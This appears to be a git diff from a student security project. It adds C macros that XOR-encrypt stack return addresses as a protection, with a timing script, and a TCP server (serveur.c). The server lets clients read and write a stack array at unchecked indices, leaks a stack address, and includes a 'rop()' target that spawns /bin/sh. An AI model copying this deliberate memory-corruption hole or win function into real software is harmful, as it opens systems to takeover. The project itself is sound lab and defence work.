555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
555555555000,555555556000,7ffff7dd3000,7ffff7f4b000,7ffffffde000,7ffffffff000
|
||||
|
3
patch2/.gitignore
vendored
Normal file
3
patch2/.gitignore
vendored
Normal file
|
|
@ -0,0 +1,3 @@
|
|||
test_avec_cipher
|
||||
test_sans_cipher
|
||||
test
|
||||
8
patch2/CMakeLists.txt
Normal file
8
patch2/CMakeLists.txt
Normal file
|
|
@ -0,0 +1,8 @@
|
|||
cmake_minimum_required(VERSION 3.17)
|
||||
project(patch2 C)
|
||||
|
||||
set(CMAKE_C_STANDARD 99)
|
||||
|
||||
add_executable(test_avec_cipher main.c rondoudou_patch2.h rondoudou_patch2.c)
|
||||
add_executable(test_sans_cipher main.c rondoudou_patch2.h rondoudou_patch2.c)
|
||||
target_compile_definitions(test_sans_cipher PRIVATE NOCIPHER)
|
||||
6
patch2/Makefile
Normal file
6
patch2/Makefile
Normal file
|
|
@ -0,0 +1,6 @@
|
|||
test_avec_cipher: main.c rondoudou_patch2.c rondoudou_patch2.h
|
||||
gcc -g main.c rondoudou_patch2.c -o test_avec_cipher
|
||||
|
||||
test_sans_cipher: main.c rondoudou_patch2.c rondoudou_patch2.h
|
||||
gcc -g main.c rondoudou_patch2.c -DNOCIPHER -o test_sans_cipher
|
||||
|
||||
48
patch2/main.c
Normal file
48
patch2/main.c
Normal file
|
|
@ -0,0 +1,48 @@
|
|||
#include <stdio.h>
|
||||
#include "rondoudou_patch2.h"
|
||||
#include "time.h"
|
||||
|
||||
void f() {
|
||||
cipher;
|
||||
print_log("Dans f\n");
|
||||
decipher;
|
||||
}
|
||||
|
||||
void g(int a) {
|
||||
cipher;
|
||||
print_log("Dans g(%d)\n", a);
|
||||
decipher;
|
||||
}
|
||||
|
||||
int h(int a) {
|
||||
cipher;
|
||||
print_log("Dans h(%d)\n", a);
|
||||
if (a > 0) {
|
||||
int ret = h(a - 1);
|
||||
decipher;
|
||||
return ret;
|
||||
}
|
||||
change_key(15165314561313153217ul);
|
||||
|
||||
decipher;
|
||||
return 5;
|
||||
}
|
||||
|
||||
|
||||
int main() {
|
||||
struct timespec start, end;
|
||||
|
||||
clock_gettime(CLOCK_MONOTONIC, &start);
|
||||
|
||||
cipher;
|
||||
for (int i = 0; i < 1000; ++i) {
|
||||
h(25);
|
||||
}
|
||||
decipher;
|
||||
|
||||
clock_gettime(CLOCK_MONOTONIC, &end);
|
||||
unsigned long ns = (end.tv_sec - start.tv_sec) * 1000000000ul + end.tv_nsec - start.tv_nsec;
|
||||
printf("%.3lfμs\n", (double) ns / 1000.0);
|
||||
|
||||
return 0;
|
||||
}
|
||||
21
patch2/rondoudou_patch2.c
Normal file
21
patch2/rondoudou_patch2.c
Normal file
|
|
@ -0,0 +1,21 @@
|
|||
#include <stdio.h>
|
||||
#include <stdarg.h>
|
||||
#include "rondoudou_patch2.h"
|
||||
|
||||
int rondoudou_patch_call_level = 0;
|
||||
uintptr_t rondoudou_patch_key = 0xffffffffffffffff;
|
||||
uintptr_t rondoudou_patch_offset = 1;
|
||||
uintptr_t *rondoudou_patch_return_addr_addr = 0;
|
||||
|
||||
int print_debug = 0;
|
||||
|
||||
int print_log(const char *format, ...) {
|
||||
if (print_debug) {
|
||||
va_list args;
|
||||
va_start(args, format);
|
||||
int ret = vprintf(format, args);
|
||||
va_end(args);
|
||||
return ret;
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
92
patch2/rondoudou_patch2.h
Normal file
92
patch2/rondoudou_patch2.h
Normal file
|
|
@ -0,0 +1,92 @@
|
|||
#ifndef PATCH2_RONDOUDOU_PATCH2_H
|
||||
#define PATCH2_RONDOUDOU_PATCH2_H
|
||||
|
||||
#include <stdint.h>
|
||||
|
||||
extern int rondoudou_patch_call_level;
|
||||
extern uintptr_t rondoudou_patch_key;
|
||||
extern uintptr_t rondoudou_patch_offset;
|
||||
extern uintptr_t *rondoudou_patch_return_addr_addr;
|
||||
|
||||
int print_log(const char *format, ...);
|
||||
|
||||
#ifdef NOCIPHER
|
||||
|
||||
#define cipher
|
||||
#define decipher
|
||||
#define change_one_address(i, new_key)
|
||||
#define change_key(new_key)
|
||||
|
||||
#else
|
||||
|
||||
#define cipher \
|
||||
do { \
|
||||
rondoudou_patch_return_addr_addr = (uintptr_t *)__builtin_frame_address(0) + rondoudou_patch_offset; \
|
||||
print_log("cipher : base return address = %018p\n", __builtin_return_address(0));\
|
||||
/*print_log("cipher : Return address = %018p\n", *rondoudou_patch_return_addr_addr);*/\
|
||||
*rondoudou_patch_return_addr_addr = *rondoudou_patch_return_addr_addr ^ rondoudou_patch_key; \
|
||||
print_log("cipher : encrypted return address = %018p\n", __builtin_return_address(0));\
|
||||
/*print_log("cipher : Return address = %018p\n", *rondoudou_patch_return_addr_addr);*/\
|
||||
rondoudou_patch_call_level++; \
|
||||
} while(0)
|
||||
|
||||
#define decipher \
|
||||
do { \
|
||||
rondoudou_patch_return_addr_addr = (uintptr_t *)__builtin_frame_address(0) + rondoudou_patch_offset; \
|
||||
print_log("decipher: encrypted return address = %018p\n", __builtin_return_address(0));\
|
||||
/*print_log("decipher: Return address = %018p\n", *rondoudou_patch_return_addr_addr);*/\
|
||||
*rondoudou_patch_return_addr_addr = *rondoudou_patch_return_addr_addr ^ rondoudou_patch_key; \
|
||||
print_log("decipher: decrypted return address = %018p\n", __builtin_return_address(0));\
|
||||
/*print_log("decipher: Return address = %018p\n", *rondoudou_patch_return_addr_addr);*/\
|
||||
rondoudou_patch_call_level--; \
|
||||
} while(0)
|
||||
|
||||
#define change_one_address(i, new_key) \
|
||||
if (rondoudou_patch_call_level > (i)) { \
|
||||
rondoudou_patch_return_addr_addr = (uintptr_t *)__builtin_frame_address(i) + rondoudou_patch_offset; \
|
||||
print_log("%d: encrypted ret address = %018p\n", i, *rondoudou_patch_return_addr_addr); \
|
||||
*rondoudou_patch_return_addr_addr = *rondoudou_patch_return_addr_addr ^ rondoudou_patch_key; \
|
||||
print_log("%d: decrypted ret address = %018p\n", i, *rondoudou_patch_return_addr_addr); \
|
||||
*rondoudou_patch_return_addr_addr = *rondoudou_patch_return_addr_addr ^ (new_key); \
|
||||
print_log("%d: reencrypted ret address = %018p\n", i, *rondoudou_patch_return_addr_addr); \
|
||||
} \
|
||||
|
||||
#define change_key(new_key) \
|
||||
do { \
|
||||
print_log("\n--- Changing key ---\n"); \
|
||||
print_log("Call_level = %d\n", rondoudou_patch_call_level); \
|
||||
\
|
||||
change_one_address(0, new_key); \
|
||||
change_one_address(1, new_key); \
|
||||
change_one_address(2, new_key); \
|
||||
change_one_address(3, new_key); \
|
||||
change_one_address(4, new_key); \
|
||||
change_one_address(5, new_key); \
|
||||
change_one_address(6, new_key); \
|
||||
change_one_address(7, new_key); \
|
||||
change_one_address(8, new_key); \
|
||||
change_one_address(9, new_key); \
|
||||
change_one_address(10, new_key); \
|
||||
change_one_address(11, new_key); \
|
||||
change_one_address(12, new_key) \
|
||||
change_one_address(13, new_key); \
|
||||
change_one_address(14, new_key); \
|
||||
change_one_address(15, new_key); \
|
||||
change_one_address(16, new_key); \
|
||||
change_one_address(17, new_key); \
|
||||
change_one_address(18, new_key); \
|
||||
change_one_address(19, new_key); \
|
||||
change_one_address(20, new_key); \
|
||||
change_one_address(21, new_key); \
|
||||
change_one_address(22, new_key); \
|
||||
change_one_address(23, new_key); \
|
||||
change_one_address(24, new_key); \
|
||||
change_one_address(25, new_key); \
|
||||
change_one_address(26, new_key); \
|
||||
\
|
||||
print_log("\n"); \
|
||||
rondoudou_patch_key = new_key; \
|
||||
} while (0)
|
||||
|
||||
#endif // NOCIPHER
|
||||
#endif //PATCH2_RONDOUDOU_PATCH2_H
|
||||
7
patch2/test_perf.sh
Executable file
7
patch2/test_perf.sh
Executable file
|
|
@ -0,0 +1,7 @@
|
|||
#!/bin/bash
|
||||
make test_avec_cipher
|
||||
make test_sans_cipher
|
||||
echo "-- Sans cipher --"
|
||||
./test_sans_cipher
|
||||
echo "-- Avec cipher --"
|
||||
./test_avec_cipher
|
||||
3
pid
Normal file
3
pid
Normal file
|
|
@ -0,0 +1,3 @@
|
|||
61552
|
||||
61665
|
||||
61922
|
||||
353
serveur.c
Normal file
353
serveur.c
Normal file
|
|
@ -0,0 +1,353 @@
|
|||
/* déclaration des types de base */
|
||||
#include <sys/types.h>
|
||||
/* constantes relatives aux domaines, types et protocoles */
|
||||
#include <sys/socket.h>
|
||||
/* constantes et structures propres au domaine INTERNET */
|
||||
#include <netinet/in.h>
|
||||
/* structures retournées par les fonctions de gestion de la base de
|
||||
données du réseau */
|
||||
#include <netdb.h>
|
||||
/* pour les entrées/sorties */
|
||||
#include <stdio.h>
|
||||
/* la lib standard */
|
||||
#include <stdlib.h>
|
||||
/* pour le fork */
|
||||
#include <signal.h>
|
||||
#include <unistd.h>
|
||||
#include <sys/wait.h>
|
||||
|
||||
/* pour la manipulation des strings */
|
||||
#include <string.h>
|
||||
|
||||
/* Taille du tableau d'int fourni au client */
|
||||
#define SIZE_TAB 128
|
||||
|
||||
#define NB_SEP 65
|
||||
#define NB_PAR_LIGNE 16
|
||||
|
||||
// printf("BEFORE: %p\n", __builtin_return_address(0));
|
||||
|
||||
|
||||
//
|
||||
// DEBUT GESTION DES FILS
|
||||
//
|
||||
|
||||
struct proc {
|
||||
int pid;
|
||||
int sock;
|
||||
struct proc *next;
|
||||
};
|
||||
|
||||
struct proc_list {
|
||||
int size;
|
||||
struct proc *first;
|
||||
};
|
||||
|
||||
struct proc_list new_list() {
|
||||
struct proc_list liste = {0, NULL};
|
||||
return liste;
|
||||
}
|
||||
|
||||
void add_proc(struct proc_list *l, int pid, int sock) {
|
||||
l->size++;
|
||||
struct proc *p = (struct proc *) malloc(sizeof(struct proc));
|
||||
p->pid = pid;
|
||||
p->sock = sock;
|
||||
p->next = l->first;
|
||||
l->first = p;
|
||||
}
|
||||
|
||||
int get_sock_and_remove_proc(struct proc_list *l, int pid) {
|
||||
int sock = -1;
|
||||
if (l->size == 0) {
|
||||
printf("Erreur : Liste vide.\n");
|
||||
} else if (l->first->pid == pid) {
|
||||
struct proc *aux = l->first;
|
||||
l->size--;
|
||||
l->first = aux->next;
|
||||
sock = aux->sock;
|
||||
free(aux);
|
||||
} else {
|
||||
struct proc *aux = l->first;
|
||||
while (aux->next != NULL && aux->next->pid != pid) {
|
||||
aux = aux->next;
|
||||
}
|
||||
if (aux->next->pid == pid) {
|
||||
struct proc *aux2 = aux->next;
|
||||
l->size--;
|
||||
aux->next = aux2->next;
|
||||
sock = aux2->sock;
|
||||
free(aux2);
|
||||
}
|
||||
}
|
||||
return sock;
|
||||
}
|
||||
|
||||
struct proc *get_first(struct proc_list *l) {
|
||||
struct proc *rt = NULL;
|
||||
if (l->size != 0) {
|
||||
rt = l->first;
|
||||
l->size--;
|
||||
l->first = rt->next;
|
||||
}
|
||||
return rt;
|
||||
}
|
||||
|
||||
struct proc_list liste;
|
||||
|
||||
//
|
||||
// FIN GESTION DES FILS
|
||||
//
|
||||
|
||||
int main_sock;
|
||||
|
||||
void handle_sigsegv(int signum) {
|
||||
fprintf(stderr, "Signal SIGSEGV (%d) received : SEG FAULT\n", signum);
|
||||
exit(134); // 134 est le code de retour habituel en cas de segfault
|
||||
}
|
||||
|
||||
void handle_sigchild(int signum) {
|
||||
// Attente de l'arrêt du fils et récupération du code de retour
|
||||
int status;
|
||||
int pid = wait(&status);
|
||||
int retCode = WEXITSTATUS(status);
|
||||
|
||||
// Récupération du socket
|
||||
int sock = get_sock_and_remove_proc(&liste, pid);
|
||||
|
||||
// Envoi de l'info de Segfault au client
|
||||
if (retCode == 134) {
|
||||
char buf[40] = "SEGFAULT";
|
||||
write(sock, buf, strlen(buf));
|
||||
printf("SEGFAULT envoyé\n");
|
||||
}
|
||||
|
||||
// Fermeture du socket
|
||||
shutdown(sock, SHUT_RDWR);
|
||||
close(sock);
|
||||
}
|
||||
|
||||
void handle_sigint(int signum) {
|
||||
// remove a handler for SIGCHLD in a part of your code
|
||||
if (signal(SIGCHLD, NULL) == SIG_ERR) {
|
||||
fprintf(stderr, "Could not install SIGSEGV handler");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
struct proc *rt = get_first(&liste);
|
||||
while (rt != NULL) {
|
||||
shutdown(rt->sock, SHUT_RDWR);
|
||||
close(rt->sock);
|
||||
kill(rt->pid, SIGINT);
|
||||
free(rt);
|
||||
rt = get_first(&liste);
|
||||
//printf("ON DETRUIT TOUT\n");
|
||||
}
|
||||
shutdown(main_sock, SHUT_RDWR);
|
||||
close(main_sock);
|
||||
exit(3);
|
||||
}
|
||||
|
||||
int min(int a, int b) {
|
||||
if (a < b) {
|
||||
return a;
|
||||
} else {
|
||||
return b;
|
||||
}
|
||||
}
|
||||
|
||||
// affichage du nombre de connexions
|
||||
void print_nb_connexions(int nb_connexions) {
|
||||
if (nb_connexions == 1) {
|
||||
printf("Nouvelle connexion, 1ere connexion\n");
|
||||
} else if (nb_connexions == 2) {
|
||||
printf("Nouvelle connexion, 2nd connexion\n");
|
||||
} else {
|
||||
printf("Nouvelle connexion, %deme connexion\n", nb_connexions);
|
||||
}
|
||||
printf("L'adresse du nombre de connexions est : %p\n", &nb_connexions);
|
||||
}
|
||||
|
||||
void print_ligne(int *ligne, int n) {
|
||||
printf("|");
|
||||
int i;
|
||||
for (i = 0; i < n; i++) {
|
||||
printf(" %d |", ligne[i]);
|
||||
}
|
||||
printf("\n");
|
||||
}
|
||||
|
||||
void print_sep() {
|
||||
int i;
|
||||
for (i = 0; i < NB_SEP; i++) {
|
||||
printf("-");
|
||||
}
|
||||
printf("\n");
|
||||
}
|
||||
|
||||
void print_tab(int *tab, int n) {
|
||||
print_sep();
|
||||
int i;
|
||||
for (i = 0; i < n; i += NB_PAR_LIGNE) {
|
||||
print_ligne(&(tab[i]), min(n - i, NB_PAR_LIGNE));
|
||||
print_sep();
|
||||
}
|
||||
}
|
||||
|
||||
// Fonction lancée a chaque fork
|
||||
void process(int sock) {
|
||||
// Tableau des datas du client
|
||||
int tab[SIZE_TAB];
|
||||
|
||||
// initialisation (tt a 0)
|
||||
int i;
|
||||
for (i = 0; i < SIZE_TAB; i++) {
|
||||
tab[i] = 0;
|
||||
}
|
||||
|
||||
int quit = 0;
|
||||
|
||||
while (quit == 0) {
|
||||
// récupération de l'input du client
|
||||
char buff[40] = "\0";
|
||||
int nbBytesRead = read(sock, buff, 40);
|
||||
|
||||
if (nbBytesRead == 0) {
|
||||
break;
|
||||
}
|
||||
|
||||
char what;
|
||||
int param1;
|
||||
int param2;
|
||||
int param3;
|
||||
|
||||
sscanf(buff, "%c.%d.%d.%d", &what, ¶m1, ¶m2, ¶m3);
|
||||
printf("%c.%d.%d.%d\n", what, param1, param2, param3);
|
||||
if (what == 'r') {
|
||||
char buff_envoi[40];
|
||||
sprintf(buff_envoi, "%d", tab[param1]);
|
||||
send(sock, buff_envoi, strlen(buff_envoi), 0);
|
||||
} else if (what == 'w') {
|
||||
tab[param2] = param1;
|
||||
} else if (what == 'a') {
|
||||
tab[param1] = tab[param2] + tab[param3];
|
||||
} else if (what == 's') {
|
||||
tab[param1] = tab[param2] - tab[param3];
|
||||
} else if (what == 'm') {
|
||||
tab[param1] = tab[param2] * tab[param3];
|
||||
} else if (what == 'd') {
|
||||
tab[param1] = tab[param2] / tab[param3];
|
||||
} else if (what == 'l') {
|
||||
if (tab[param1] < tab[param2]) {
|
||||
send(sock, "1", 1, 0);
|
||||
} else {
|
||||
send(sock, "0", 1, 0);
|
||||
}
|
||||
} else if (what == 'e') {
|
||||
if (tab[param1] == tab[param2]) {
|
||||
send(sock, "1", 1, 0);
|
||||
} else {
|
||||
send(sock, "0", 1, 0);
|
||||
}
|
||||
} else if (what == 'p') {
|
||||
print_tab(tab, SIZE_TAB);
|
||||
} else {
|
||||
quit = -1;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Fonction que l'on veut appeler en écrivant son adresse dans la pile
|
||||
void rop() {
|
||||
printf("Exploit successful!\n");
|
||||
system("/bin/sh");
|
||||
}
|
||||
|
||||
|
